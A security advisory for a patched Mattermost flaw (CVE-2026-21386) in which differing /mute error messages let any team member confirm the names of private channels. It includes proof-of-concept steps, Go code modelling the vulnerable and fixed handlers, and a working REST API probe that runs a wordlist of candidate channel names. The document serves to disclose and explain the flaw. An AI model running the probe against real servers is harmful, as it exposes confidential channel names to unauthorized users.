Status: Patched
This vulnerability has been verified as resolved and deployed.
Private Channel Enumeration via /mute Slash Command (CVE-2026-21386)
Summary
The /mute slash command returned different error messages for nonexistent channels versus private channels the user was not a member of, allowing any authenticated user to enumerate private channels.
The MuteProvider.DoCommand handler lets a user pass ~channel-handle to toggle the mute state of a channel. Instead of using an authorization-aware helper, it calls Store().Channel().GetByName() directly, which returns private channel metadata without checking membership. The handler then returns two different localized errors: api.command_mute.error when no channel with that handle exists, and api.command_mute.not_member.error when ToggleMuteChannel fails because the caller is not a member. Any authenticated team member can therefore probe arbitrary handles (/mute ~secret-ops) and distinguish nonexistent channels from private channels they are not authorized to know about, leaking channel existence and names.
CVSS Score
Vulnerability Location
Sink-to-Source Analysis
- User-supplied channelName is looked up via the raw store, which returns private channels without a membership check.
- A nonexistent channel produces one error message (api.command_mute.error).
- A channel that exists but that the user is not a member of produces a different error string (api.command_mute.not_member.error), so the two cases can be told apart.
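The control flow described above, as an added example (editor's own Go, not Mattermost's code): a simplified model of the handler in which the raw store lookup and the membership toggle are stand-ins, with the leaking version beside a membership-aware version that returns the same not-found response for a private channel the caller cannot see. The Store, Channel and NewDemoStore types, the user and team IDs, and the shape of the fix are assumptions; only the two error keys come from the write-up.

```go
package main

import "fmt"

// Channel is a minimal stand-in for the server's channel record (assumed shape,
// not the real model.Channel).
type Channel struct {
	ID      string
	TeamID  string
	Name    string
	Private bool
	Members map[string]bool // user ID -> is member
}

// Store stands in for the raw channel store. GetByName resolves a handle with no
// authorization check, which is the behaviour the write-up attributes to
// Store().Channel().GetByName().
type Store struct {
	byName map[string]*Channel
}

func (s *Store) GetByName(teamID, name string) *Channel {
	ch := s.byName[name]
	if ch == nil || ch.TeamID != teamID {
		return nil
	}
	return ch
}

// Error keys as quoted in the write-up.
const (
	ErrNotFound  = "api.command_mute.error"
	ErrNotMember = "api.command_mute.not_member.error"
)

// MuteVulnerable reproduces the leaking control flow: the raw lookup succeeds for
// a private channel the caller cannot see, and the later membership failure is
// reported with a different message than the not-found case.
func MuteVulnerable(s *Store, teamID, userID, handle string) string {
	ch := s.GetByName(teamID, handle)
	if ch == nil {
		return ErrNotFound
	}
	if !ch.Members[userID] { // models ToggleMuteChannel returning nil
		return ErrNotMember
	}
	return "muted " + ch.Name
}

// MuteFixed applies the visibility check at lookup time, so a private channel the
// caller does not belong to produces exactly the not-found response. The shape of
// this fix is the editor's assumption; the write-up only says the patch uses an
// authorization-aware helper.
func MuteFixed(s *Store, teamID, userID, handle string) string {
	ch := s.GetByName(teamID, handle)
	if ch == nil || (ch.Private && !ch.Members[userID]) {
		return ErrNotFound
	}
	if !ch.Members[userID] {
		// Public channel the caller has not joined: its existence is not secret.
		return ErrNotMember
	}
	return "muted " + ch.Name
}

// NewDemoStore builds constructed sample data: one private channel with a single
// member and one public channel.
func NewDemoStore() *Store {
	return &Store{byName: map[string]*Channel{
		"secret-ops": {ID: "c1", TeamID: "team1", Name: "secret-ops", Private: true,
			Members: map[string]bool{"alice": true}},
		"town-square": {ID: "c2", TeamID: "team1", Name: "town-square", Private: false,
			Members: map[string]bool{"alice": true, "mallory": true}},
	}}
}

func main() {
	s := NewDemoStore()
	// mallory is a team member but not in secret-ops: the vulnerable handler
	// answers the two handles differently, the fixed one identically.
	for _, h := range []string{"secret-ops", "doesnotexist"} {
		fmt.Printf("%-14s vulnerable=%q fixed=%q\n", h,
			MuteVulnerable(s, "team1", "mallory", h), MuteFixed(s, "team1", "mallory", h))
	}
}
```

The check worth keeping from this model is the last one in MuteFixed: a private channel the caller cannot see must take the same path, and return the same bytes, as a handle that matches nothing, and the membership-specific message may only be used once visibility has been established.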
Impact Analysis
Critical Impact
An attacker can test candidate handles and confirm which private channels exist in a team, revealing sensitive project or incident names that should be hidden. No channel content is exposed, but the leaked names support targeted social engineering and reconnaissance. The attack is low complexity, and with no throttling on slash commands it can be automated across a wordlist.
Attack Surface
Any authenticated user in a team can issue slash commands. The /mute command with ~channelname arguments is the attack vector.
Preconditions
The attacker must be an authenticated member of the team but needs no special role; only the team ID and membership in some channel (required to run slash commands) are needed.
Proof of Concept
Environment Setup
Requirements: Ubuntu 22.04 or macOS 14.
Install dependencies:
Clone and build Mattermost:
Server listens on http://localhost:8065.
Target Configuration
- Create an admin account and a test team via the web UI.
- Sign in as an ordinary member ([email protected]).
- Ensure a private channel named secret-ops exists in the team where the user is not a member.
Exploit Delivery
Use the slash command input box:
- In any channel, run /mute ~secret-ops.
- Observe the response api.command_mute.not_member.error.
- Run /mute ~doesnotexist and observe api.command_mute.error.
Alternatively, using the REST API:
Log responses:
- api.command_mute.not_member.error → private channel exists
- api.command_mute.error → channel absent
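As an added example (editor's own, not part of the advisory or the project), a probe that drives the oracle through Mattermost's POST /api/v4/commands/execute endpoint and sorts candidate handles by which of the two responses comes back. The endpoint and its team_id/channel_id/command body are the documented API; the candidate names, the offline stand-in executor in main, and matching on the raw error keys (a live server returns the localized text for those keys) are assumptions.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
	"strings"
)

// Error keys as quoted in the write-up. A live server returns the localized text
// for these keys, so copy the two strings from the responses observed above.
const (
	KeyNotFound  = "api.command_mute.error"
	KeyNotMember = "api.command_mute.not_member.error"
)

// Executor runs one slash command and returns the response text. A function type
// lets the probe run against an offline stand-in as well as a real server.
type Executor func(command string) (string, error)

// HTTPExecutor posts the command to POST /api/v4/commands/execute, authenticating
// with a session or personal access token of the probing user.
func HTTPExecutor(baseURL, token, teamID, channelID string) Executor {
	return func(command string) (string, error) {
		body, err := json.Marshal(map[string]string{
			"team_id": teamID, "channel_id": channelID, "command": command,
		})
		if err != nil {
			return "", err
		}
		req, err := http.NewRequest(http.MethodPost, baseURL+"/api/v4/commands/execute", bytes.NewReader(body))
		if err != nil {
			return "", err
		}
		req.Header.Set("Authorization", "Bearer "+token)
		req.Header.Set("Content-Type", "application/json")
		resp, err := http.DefaultClient.Do(req)
		if err != nil {
			return "", err
		}
		defer resp.Body.Close()
		var out struct {
			Text string `json:"text"` // CommandResponse.text holds the ephemeral message
		}
		if err := json.NewDecoder(resp.Body).Decode(&out); err != nil {
			return "", err
		}
		return out.Text, nil
	}
}

// Verdict is the oracle's answer for one handle.
type Verdict int

const (
	Unknown       Verdict = iota // success or an unexpected message
	Absent                       // no such channel
	PrivateExists                // channel exists but caller is not a member
)

// Classify maps one response to a verdict by exact match on the two strings.
func Classify(text string) Verdict {
	switch strings.TrimSpace(text) {
	case KeyNotMember:
		return PrivateExists
	case KeyNotFound:
		return Absent
	}
	return Unknown
}

// Probe issues /mute ~<handle> for each candidate and returns those the oracle
// reports as existing private channels. Each candidate is reduced to its first
// token so a wordlist entry cannot carry extra command arguments. /mute toggles
// the mute state of channels the caller does belong to, so keep already-joined
// channels out of the candidate list.
func Probe(exec Executor, candidates []string) ([]string, error) {
	var found []string
	for _, c := range candidates {
		fields := strings.Fields(strings.TrimPrefix(strings.TrimSpace(c), "~"))
		if len(fields) == 0 {
			continue
		}
		text, err := exec("/mute ~" + fields[0])
		if err != nil {
			return found, err
		}
		if Classify(text) == PrivateExists {
			found = append(found, fields[0])
		}
	}
	return found, nil
}

func main() {
	// Offline stand-in that answers like the two responses recorded in the PoC.
	// Against a server, use: HTTPExecutor("http://localhost:8065", token, teamID, channelID)
	exec := Executor(func(cmd string) (string, error) {
		if cmd == "/mute ~secret-ops" {
			return KeyNotMember, nil
		}
		return KeyNotFound, nil
	})
	found, err := Probe(exec, []string{"secret-ops", "incident-42", "doesnotexist"}) // constructed candidates
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println("private channels confirmed:", found)
}
```

Classify is deliberately strict: anything other than the two recorded strings, including the success message a member would get, is reported as Unknown rather than guessed, so a change in server wording shows up as a run that finds nothing rather than as false positives.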
Outcome
Attacker enumerates names of private channels without authorization, leaking sensitive project names.
Expected Response: Different error messages for existing private channels vs. nonexistent channels allow binary enumeration.
